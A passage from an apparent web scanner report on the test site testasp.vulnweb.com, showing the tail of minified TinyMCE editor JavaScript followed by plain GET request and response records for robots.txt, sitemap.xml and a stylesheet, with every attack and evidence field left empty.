div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyCenter":img.removeAttribute('align');var div=tinyMCE.getParentElement(focusElm,"div");if(div&&div.style.textAlign=="center"){if(div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);}else{var div=this.getDoc().createElement("div");div.style.textAlign='center';div.appendChild(img);focusElm.parentNode.replaceChild(div,focusElm);}this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyRight":if(align=='right')img.removeAttribute('align');else img.setAttribute('align','right');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;}}if(tinyMCE.settings['force_br_newlines']){var alignValue="";if(doc.selection.type!="Control"){switch(command){case "JustifyLeft":alignValue="left";break;case "JustifyCenter":alignValue="center";break;case "JustifyFull":alignValue="justify";break;case "JustifyRight":alignValue="right";break;}if(alignValue!=""){var rng=doc.selection.createRange();if((divElm=tinyMCE.getParentElement(rng.parentElement(),"div"))!=null)divElm.setAttribute("align",alignValue);else if(rng.pasteHTML&&rng.htmlText.length>0)rng.pasteHTML('<div align="'+alignValue+'">'+rng.htmlText+"</div>");tinyMCE.triggerNodeChange();return;}}}switch(command){case "mceRepaint":this.repaint();return true;case "mceStoreSelection":this.selectionBookmark=this.getBookmark();return true;case "mceRestoreSelection":this.moveToBookmark(this.selectionBookmark);return true;case "InsertUnorderedList":case "InsertOrderedList":var tag=(command=="InsertUnorderedList")?"ul":"ol";if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<"+tag+"><li> </li><"+tag+">");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "Strikethrough":if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<strike>"+this.getSelectedHTML()+"</strike>");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "mceSelectNode":this.selectNode(value);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=value;break;case "FormatBlock":if(value==null||value==""){var elm=tinyMCE.getParentElement(this.getFocusElement(),"p,div,h1,h2,h3,h4,h5,h6,pre,address");if(elm)this.execCommand("mceRemoveNode",false,elm);}else this.getDoc().execCommand("FormatBlock",false,value);tinyMCE.triggerNodeChange();break;case "mceRemoveNode":if(!value)value=tinyMCE.getParentElement(this.getFocusElement());if(tinyMCE.isMSIE){value.outerHTML=value.innerHTML;}else{var rng=value.ownerDocument.createRange();rng.setStartBefore(value);rng.setEndAfter(value);rng.deleteContents();rng.insertNode(rng.createContextualFragment(value.innerHTML));}tinyMCE.triggerNodeChange();break;case "mceSelectNodeDepth":var parentNode=this.getFocusElement();for(var i=0;parentNode;i++){if(parentNode.nodeName.toLowerCase()=="body")break;if(parentNode.nodeName.toLowerCase()=="#text"){i--;parentNode=parentNode.parentNode;continue;}if(i==value){this.selectNode(parentNode,false);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=parentNode;return;}parentNode=parentNode.parentNode;}break;case "SetStyleInfo":var rng=this.getRng();var sel=this.getSel();var scmd=value['command'];var sname=value['name'];var svalue=value['value']==null?'':value['value'];var wrapper=value['wrapper']?value['wrapper']:"span";var parentElm=null;var invalidRe=new RegExp("^BODY|HTML$","g");var invalidParentsRe=tinyMCE.settings['merge_styles_invalid_parents']!=''?new RegExp(tinyMCE.settings['merge_styles_invalid_parents'],"gi"):null;if(tinyMCE.isMSIE){if(rng.item)parentElm=rng.item(0);else{var pelm=rng.parentElement();var prng=doc.selection.createRange();prng.moveToElementText(pelm);if(rng.htmlText==prng.htmlText||rng.boundingWidth==0){if(invalidParentsRe==null||!invalidParentsRe.test(pelm.nodeName))parentElm=pelm;}}}else{var felm=this.getFocusElement();if(sel.isCollapsed||(/td|tr|tbody|table/ig.test(felm.nodeName)&&sel.anchorNode==felm.parentNode))parentElm=felm;}if(parentElm&&!invalidRe.test(parentElm.nodeName)){if(scmd=="setstyle")tinyMCE.setStyleAttrib(parentElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(parentElm,sname,svalue);if(scmd=="removeformat"){parentElm.style.cssText='';tinyMCE.setAttrib(parentElm,'class','');}var ch=tinyMCE.getNodeTree(parentElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==parentElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}else{doc.execCommand("fontname",false,"#mce_temp_font#");var elementArray=tinyMCE.getElementsByAttributeValue(this.getBody(),"font","face","#mce_temp_font#");for(var x=0;x<elementArray.length;x++){elm=elementArray[x];if(elm){var spanElm=doc.createElement(wrapper);if(scmd=="setstyle")tinyMCE.setStyleAttrib(spanElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(spanElm,sname,svalue);if(scmd=="removeformat"){spanElm.style.cssText='';tinyMCE.setAttrib(spanElm,'class','');}if(elm.hasChildNodes()){for(var i=0;i<elm.childNodes.length;i++)spanElm.appendChild(elm.childNodes[i].cloneNode(true));}spanElm.setAttribute("mce_new","true");elm.parentNode.replaceChild(spanElm,elm);var ch=tinyMCE.getNodeTree(spanElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==spanElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isNew=tinyMCE.getAttrib(elm,"mce_new")=="true";elm.removeAttribute("mce_new");if(elm.childNodes&&elm.childNodes.length==1&&elm.childNodes[0].nodeType==1){this._mergeElements(scmd,elm,elm.childNodes[0],isNew);continue;}if(elm.parentNode.childNodes.length==1&&!invalidRe.test(elm.nodeName)&&!invalidRe.test(elm.parentNode.nodeName)){if(invalidParentsRe==null||!invalidParentsRe.test(elm.parentNode.nodeName))this._mergeElements(scmd,elm.parentNode,elm,false);}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isEmpty=true;var tmp=doc.createElement("body");tmp.appendChild(elm.cloneNode(false));tmp.innerHTML=tmp.innerHTML.replace(new RegExp('style=""|class=""','gi'),'');if(new RegExp('<span>','gi').test(tmp.innerHTML)){for(var x=0;x<elm.childNodes.length;x++){if(elm.parentNode!=null)elm.parentNode.insertBefore(elm.childNodes[x].cloneNode(true),elm);}elm.parentNode.removeChild(elm);}}if(scmd=="removeformat")tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "FontName":this.getDoc().execCommand('FontName',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "FontSize":this.getDoc().execCommand('FontSize',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "forecolor":this.getDoc().execCommand('forecolor',false,value);break;case "HiliteColor":if(tinyMCE.isGecko){this.setUseCSS(true);this.getDoc().execCommand('hilitecolor',false,value);this.setUseCSS(false);}else this.getDoc().execCommand('BackColor',false,value);break;case "Cut":case "Copy":case "Paste":var cmdFailed=false;eval('try {this.getDoc().execCommand(command, user_interface, value);} catch (e) {cmdFailed = true;}');if(tinyMCE.isOpera&&cmdFailed)alert('Currently not supported by your browser, use keyboard shortcuts instead.');if(tinyMCE.isGecko&&cmdFailed){if(confirm(tinyMCE.getLang('lang_clipboard_msg')))window.open('http://www.mozilla.org/editor/midasdemo/securityprefs.html','mceExternal');return;}else tinyMCE.triggerNodeChange();break;case "mceSetContent":if(!value)value="";value=tinyMCE._customCleanup(this,"insert_to_editor",value);tinyMCE._setHTML(doc,value);tinyMCE.setInnerHTML(doc.body,tinyMCE._cleanupHTML(this,doc,tinyMCE.settings,doc.body));tinyMCE.handleVisualAid(doc.body,true,this.visualAid,this);tinyMCE._setEventsEnabled(doc.body,false);return true;case "mceLink":var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(!tinyMCE.linkElement){if((tinyMCE.selectedElement.nodeName.toLowerCase()!="img")&&(selectedText.length<=0))return;}var href="",target="",title="",onclick="",action="insert",style_class="";if(tinyMCE.selectedElement.nodeName.toLowerCase()=="a")tinyMCE.linkElement=tinyMCE.selectedElement;if(tinyMCE.linkElement!=null&&tinyMCE.getAttrib(tinyMCE.linkElement,'href')=="")tinyMCE.linkElement=null;if(tinyMCE.linkElement){href=tinyMCE.getAttrib(tinyMCE.linkElement,'href');target=tinyMCE.getAttrib(tinyMCE.linkElement,'target');title=tinyMCE.getAttrib(tinyMCE.linkElement,'title');onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');style_class=tinyMCE.getAttrib(tinyMCE.linkElement,'class');if(onclick=="")onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');onclick=tinyMCE.cleanupEventStr(onclick);mceRealHref=tinyMCE.getAttrib(tinyMCE.linkElement,'mce_real_href');if(mceRealHref!="")href=mceRealHref;href=eval(tinyMCE.settings['urlconverter_callback']+"(href, tinyMCE.linkElement, true);");action="update";}if(this.settings['insertlink_callback']){var returnVal=eval(this.settings['insertlink_callback']+"(href, target, title, onclick, action, style_class);");if(returnVal&&returnVal['href'])tinyMCE.insertLink(returnVal['href'],returnVal['target'],returnVal['title'],returnVal['onclick'],returnVal['style_class']);}else{tinyMCE.openWindow(this.insertLinkTemplate,{href:href,target:target,title:title,onclick:onclick,action:action,className:style_class});}break;case "mceImage":var src="",alt="",border="",hspace="",vspace="",width="",height="",align="";var title="",onmouseover="",onmouseout="",action="insert";var img=tinyMCE.imgElement;if(tinyMCE.selectedElement!=null&&tinyMCE.selectedElement.nodeName.toLowerCase()=="img"){img=tinyMCE.selectedElement;tinyMCE.imgElement=img;}if(img){if(tinyMCE.getAttrib(img,'name').indexOf('mce_')==0)return;src=tinyMCE.getAttrib(img,'src');alt=tinyMCE.getAttrib(img,'alt');if(alt=="")alt=tinyMCE.getAttrib(img,'title');if(tinyMCE.isGecko){var w=img.style.width;if(w!=null&&w!="")img.setAttribute("width",w);var h=img.style.height;if(h!=null&&h!="")img.setAttribute("height",h);}border=tinyMCE.getAttrib(img,'border');hspace=tinyMCE.getAttrib(img,'hspace');vspace=tinyMCE.getAttrib(img,'vspace');width=tinyMCE.getAttrib(img,'width');height=tinyMCE.getAttrib(img,'height');align=tinyMCE.getAttrib(img,'align');onmouseover=tinyMCE.getAttrib(img,'onmouseover');onmouseout=tinyMCE.getAttrib(img,'onmouseout');title=tinyMCE.getAttrib(img,'title');if(tinyMCE.isMSIE){width=img.attributes['width'].specified?width:"";height=img.attributes['height'].specified?height:"";}onmouseover=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseover));onmouseout=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseout));mceRealSrc=tinyMCE.getAttrib(img,'mce_real_src');if(mceRealSrc!="")src=mceRealSrc;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, img, true);");if(onmouseover!="")onmouseover=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, img, true);");if(onmouseout!="")onmouseout=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, img, true);");action="update";}if(this.settings['insertimage_callback']){var returnVal=eval(this.settings['insertimage_callback']+"(src, alt, border, hspace, vspace, width, height, align, title, onmouseover, onmouseout, action);");if(returnVal&&returnVal['src'])tinyMCE.insertImage(returnVal['src'],returnVal['alt'],returnVal['border'],returnVal['hspace'],returnVal['vspace'],returnVal['width'],returnVal['height'],returnVal['align'],returnVal['title'],returnVal['onmouseover'],returnVal['onmouseout']);}else tinyMCE.openWindow(this.insertImageTemplate,{src:src,alt:alt,border:border,hspace:hspace,vspace:vspace,width:width,height:height,align:align,title:title,onmouseover:onmouseover,onmouseout:onmouseout,action:action});break;case "mceCleanup":tinyMCE._setHTML(this.contentDocument,this.getBody().innerHTML);tinyMCE.setInnerHTML(this.getBody(),tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,this.getBody(),this.visualAid));tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE._setEventsEnabled(this.getBody(),false);this.repaint();tinyMCE.triggerNodeChange();break;case "mceReplaceContent":this.getWin().focus();var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(selectedText.length>0){value=tinyMCE.replaceVar(value,"selection",selectedText);tinyMCE.execCommand('mceInsertContent',false,value);}tinyMCE.triggerNodeChange();break;case "mceSetAttribute":if(typeof(value)=='object'){var targetElms=(typeof(value['targets'])=="undefined")?"p,img,span,div,td,h1,h2,h3,h4,h5,h6,pre,address":value['targets'];var targetNode=tinyMCE.getParentElement(this.getFocusElement(),targetElms);if(targetNode){targetNode.setAttribute(value['name'],value['value']);tinyMCE.triggerNodeChange();}}break;case "mceSetCSSClass":this.execCommand("SetStyleInfo",false,{command:"setattrib",name:"class",value:value});break;case "mceInsertRawHTML":var key='tiny_mce_marker';this.execCommand('mceBeginUndoLevel');this.execCommand('mceInsertContent',false,key);var scrollX=this.getDoc().body.scrollLeft+this.getDoc().documentElement.scrollLeft;var scrollY=this.getDoc().body.scrollTop+this.getDoc().documentElement.scrollTop;var html=this.getBody().innerHTML;if((pos=html.indexOf(key))!=-1)tinyMCE.setInnerHTML(this.getBody(),html.substring(0,pos)+value+html.substring(pos+key.length));this.contentWindow.scrollTo(scrollX,scrollY);this.execCommand('mceEndUndoLevel');break;case "mceInsertContent":var insertHTMLFailed=false;this.getWin().focus();if(tinyMCE.isGecko||tinyMCE.isOpera){try{this.getDoc().execCommand('inserthtml',false,value);}catch(ex){insertHTMLFailed=true;}if(!insertHTMLFailed){tinyMCE.triggerNodeChange();return;}}if(tinyMCE.isOpera&&insertHTMLFailed){this.getDoc().execCommand("insertimage",false,tinyMCE.uniqueURL);var ar=tinyMCE.getElementsByAttributeValue(this.getBody(),"img","src",tinyMCE.uniqueURL);ar[0].outerHTML=value;return;}if(!tinyMCE.isMSIE){var isHTML=value.indexOf('<')!=-1;var sel=this.getSel();var rng=this.getRng();if(isHTML){if(tinyMCE.isSafari){var tmpRng=this.getDoc().createRange();tmpRng.setStart(this.getBody(),0);tmpRng.setEnd(this.getBody(),0);value=tmpRng.createContextualFragment(value);}else value=rng.createContextualFragment(value);}else{var el=document.createElement("div");el.innerHTML=value;value=el.firstChild.nodeValue;value=doc.createTextNode(value);}if(tinyMCE.isSafari&&!isHTML){this.execCommand('InsertText',false,value.nodeValue);tinyMCE.triggerNodeChange();return true;}else if(tinyMCE.isSafari&&isHTML){rng.deleteContents();rng.insertNode(value);tinyMCE.triggerNodeChange();return true;}rng.deleteContents();if(rng.startContainer.nodeType==3){var node=rng.startContainer.splitText(rng.startOffset);node.parentNode.insertBefore(value,node);}else rng.insertNode(value);if(!isHTML){sel.selectAllChildren(doc.body);sel.removeAllRanges();var rng=doc.createRange();rng.selectNode(value);rng.collapse(false);sel.addRange(rng);}else rng.collapse(false);}else{var rng=doc.selection.createRange();if(rng.item)rng.item(0).outerHTML=value;else rng.pasteHTML(value);}tinyMCE.triggerNodeChange();break;case "mceStartTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex==-1){this.typingUndoIndex=this.undoIndex;this.execCommand('mceAddUndoLevel');}break;case "mceEndTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex!=-1){this.execCommand('mceAddUndoLevel');this.typingUndoIndex=-1;}break;case "mceBeginUndoLevel":this.undoRedo=false;break;case "mceEndUndoLevel":this.undoRedo=true;this.execCommand('mceAddUndoLevel');break;case "mceAddUndoLevel":if(tinyMCE.settings['custom_undo_redo']&&this.undoRedo){if(this.typingUndoIndex!=-1){this.undoIndex=this.typingUndoIndex;}var newHTML=tinyMCE.trim(this.getBody().innerHTML);if(newHTML!=this.undoLevels[this.undoIndex]){tinyMCE.executeCallback('onchange_callback','_onchange',0,this);var customUndoLevels=tinyMCE.settings['custom_undo_redo_levels'];if(customUndoLevels!=-1&&this.undoLevels.length>customUndoLevels){for(var i=0;i<this.undoLevels.length-1;i++){this.undoLevels[i]=this.undoLevels[i+1];}this.undoLevels.length--;this.undoIndex--;}this.undoIndex++;this.undoLevels[this.undoIndex]=newHTML;this.undoLevels.length=this.undoIndex+1;tinyMCE.triggerNodeChange(false);}}break;case "Undo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex>0){this.undoIndex--;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "Redo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex<(this.undoLevels.length-1)){this.undoIndex++;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "mceToggleVisualAid":this.visualAid=!this.visualAid;tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "Indent":this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();if(tinyMCE.isMSIE){var n=tinyMCE.getParentElement(this.getFocusElement(),"blockquote");do{if(n&&n.nodeName=="BLOCKQUOTE"){n.removeAttribute("dir");n.removeAttribute("style");}}while(n!=null&&(n=n.parentNode)!=null);}break;case "removeformat":var text=this.getSelectedText();if(tinyMCE.isOpera){this.getDoc().execCommand("RemoveFormat",false,null);return;}if(tinyMCE.isMSIE){try{var rng=doc.selection.createRange();rng.execCommand("RemoveFormat",false,null);}catch(e){}this.execCommand("SetStyleInfo",false,{command:"removeformat"});}else{this.getDoc().execCommand(command,user_interface,value);this.execCommand("SetStyleInfo",false,{command:"removeformat"});}if(text.length==0)this.execCommand("mceSetCSSClass",false,"");tinyMCE.triggerNodeChange();break;default:this.getDoc().execCommand(command,user_interface,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);else tinyMCE.triggerNodeChange();}if(command!="mceAddUndoLevel"&&command!="Undo"&&command!="Redo"&&command!="mceStartTyping"&&command!="mceEndTyping")tinyMCE.execCommand("mceAddUndoLevel");};TinyMCEControl.prototype.queryCommandValue=function(command){return this.getDoc().queryCommandValue(command);};TinyMCEControl.prototype.queryCommandState=function(command){return this.getDoc().queryCommandState(command);};TinyMCEControl.prototype.onAdd=function(replace_element,form_element_name,target_document){var targetDoc=target_document?target_document:document;this.targetDoc=targetDoc;tinyMCE.themeURL=tinyMCE.baseURL+"/themes/"+this.settings['theme'];this.settings['themeurl']=tinyMCE.themeURL;if(!replace_element){alert("Error: Could not find the target element.");return false;}var templateFunction=tinyMCE._getThemeFunction('_getInsertLinkTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertLinkTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getInsertImageTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertImageTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getEditorTemplate');if(eval("typeof("+templateFunction+")")=='undefined'){alert("Error: Could not find the template function: "+templateFunction);return false;}var editorTemplate=eval(templateFunction+'(this.settings, this.editorId);');var deltaWidth=editorTemplate['delta_width']?editorTemplate['delta_width']:0;var deltaHeight=editorTemplate['delta_height']?editorTemplate['delta_height']:0;var html='<span id="'+this.editorId+'_parent">'+editorTemplate['html'];var templateFunction=tinyMCE._getThemeFunction('_handleNodeChange',true);if(eval("typeof("+templateFunction+")")!='undefined')this.settings['handleNodeChangeCallback']=templateFunction;html=tinyMCE.replaceVar(html,"editor_id",this.editorId);this.settings['default_document']=tinyMCE.baseURL+"/blank.htm";this.settings['old_width']=this.settings['width'];this.settings['old_height']=this.settings['height'];if(this.settings['width']==-1)this.settings['width']=replace_element.offsetWidth;if(this.settings['height']==-1)this.settings['height']=replace_element.offsetHeight;if(this.settings['width']==0)this.settings['width']=replace_element.style.width;if(this.settings['height']==0)this.settings['height']=replace_element.style.height;if(this.settings['width']==0)this.settings['width']=320;if(this.settings['height']==0)this.settings['height']=240;this.settings['area_width']=parseInt(this.settings['width']);this.settings['area_height']=parseInt(this.settings['height']);this.settings['area_width']+=deltaWidth;this.settings['area_height']+=deltaHeight;if((""+this.settings['width']).indexOf('%')!=-1)this.settings['area_width']="100%";if((""+this.settings['height']).indexOf('%')!=-1)this.settings['area_height']="100%";if((""+replace_element.style.width).indexOf('%')!=-1){this.settings['width']=replace_element.style.width;this.settings['area_width']="100%";}if((""+replace_element.style.height).indexOf('%')!=-1){this.settings['height']=replace_element.style.height;this.settings['area_height']="100%";}html=tinyMCE.applyTemplate(html);this.settings['width']=this.settings['old_width'];this.settings['height']=this.settings['old_height'];this.visualAid=this.settings['visual'];this.formTargetElementId=form_element_name;if(replace_element.nodeName=="TEXTAREA"||replace_element.nodeName=="INPUT")this.startContent=replace_element.value;else this.startContent=replace_element.innerHTML;if(replace_element.nodeName.toLowerCase()!="textarea"){this.oldTargetElement=replace_element.cloneNode(true);if(tinyMCE.settings['debug'])html+='<textarea wrap="off" id="'+form_element_name+'" name="'+form_element_name+'" cols="100" rows="15"></textarea>';else html+='<input type="hidden" type="text" id="'+form_element_name+'" name="'+form_element_name+'" />';html+='</span>';if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.replaceChild(fragment,replace_element);}else replace_element.outerHTML=html;}else{html+='</span>';this.oldTargetElement=replace_element;if(!tinyMCE.settings['debug'])this.oldTargetElement.style.display="none";if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.insertBefore(fragment,replace_element);}else replace_element.insertAdjacentHTML("beforeBegin",html);}var dynamicIFrame=false;var tElm=targetDoc.getElementById(this.editorId);if(!tinyMCE.isMSIE){if(tElm&&tElm.nodeName.toLowerCase()=="span"){tElm=tinyMCE._createIFrame(tElm);dynamicIFrame=true;}this.targetElement=tElm;this.iframeElement=tElm;this.contentDocument=tElm.contentDocument;this.contentWindow=tElm.contentWindow;}else{if(tElm&&tElm.nodeName.toLowerCase()=="span")tElm=tinyMCE._createIFrame(tElm);else tElm=targetDoc.frames[this.editorId];this.targetElement=tElm;this.iframeElement=targetDoc.getElementById(this.editorId);if(tinyMCE.isOpera){this.contentDocument=this.iframeElement.contentDocument;this.contentWindow=this.iframeElement.contentWindow;dynamicIFrame=true;}else{this.contentDocument=tElm.window.document;this.contentWindow=tElm.window;}this.getDoc().designMode="on";}var doc=this.contentDocument;if(dynamicIFrame){var html=tinyMCE.getParam('doctype')+'<html><head xmlns="http://www.w3.org/1999/xhtml"><base href="'+tinyMCE.settings['base_href']+'" /><title>blank_page</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body class="mceContentBody"></body></html>';try{this.getDoc().designMode="on";doc.open();doc.write(html);doc.close();}catch(e){this.getDoc().location.href=tinyMCE.baseURL+"/blank.htm";}}if(tinyMCE.isMSIE)window.setTimeout("TinyMCE.prototype.addEventHandlers('"+this.editorId+"');",1);tinyMCE.setupContent(this.editorId,true);return true;};TinyMCEControl.prototype.getFocusElement=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){var doc=this.getDoc();var rng=doc.selection.createRange();var elm=rng.item?rng.item(0):rng.parentElement();}else{var sel=this.getSel();var rng=this.getRng();var elm=rng.commonAncestorContainer;if(!rng.collapsed){if(rng.startContainer==rng.endContainer){if(rng.startOffset-rng.endOffset<2){if(rng.startContainer.hasChildNodes())elm=rng.startContainer.childNodes[rng.startOffset];}}}elm=tinyMCE.getParentElement(elm);}return elm;};var tinyMCE=new TinyMCE();var tinyMCELang=new Array(); |
| URL | http://testasp.vulnweb.com/robots.txt |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 216 bytes. |
GET http://testasp.vulnweb.com/robots.txt HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 245 bytes. |
HTTP/1.1 200 OK
Content-Type: text/plain Last-Modified: Mon, 06 May 2019 12:45:52 GMT Accept-Ranges: bytes ETag: "3629faa394d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 13 |
| Response Body - size: 13 bytes. |
User-agent: *
|
| URL | http://testasp.vulnweb.com/sitemap.xml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 272 bytes. |
GET http://testasp.vulnweb.com/sitemap.xml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/styles.css |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/styles.css HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 247 bytes. |
HTTP/1.1 200 OK
Content-Type: text/css Last-Modified: Thu, 29 May 2008 12:11:27 GMT Accept-Ranges: bytes ETag: "cea5331f85c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3390 |
| Response Body - size: 3,390 bytes. |
body {
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; margin: 0; } td { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } th { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .bodystyle { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .small { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 9px; } .medium { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .big { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 16px; } .xbig { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 24px; } .expanded { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; letter-spacing: 2px; } .justified { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; text-align: justify; } .footer { font-family: "Times New Roman", Times, serif; font-size: 10px; color: #008F00; } .menubar { padding: 3px; border-width: thin; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; margin-top: 5px; margin-bottom: 5px; margin-right: 0px; margin-left: 0px; background-color: #BFFFBF; } A.menu { padding-right: 10px; padding-left: 10px; color: #008F00; text-decoration: none; background-color: #BFFFBF; } A.menu:hover { padding-right: 10px; padding-left: 10px; color: #BFFFBF; text-decoration: none; background-color: #008F00; } .disclaimer { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; padding-top: 0px; padding-right: 10px; padding-bottom: 0px; padding-left: 10px; color: 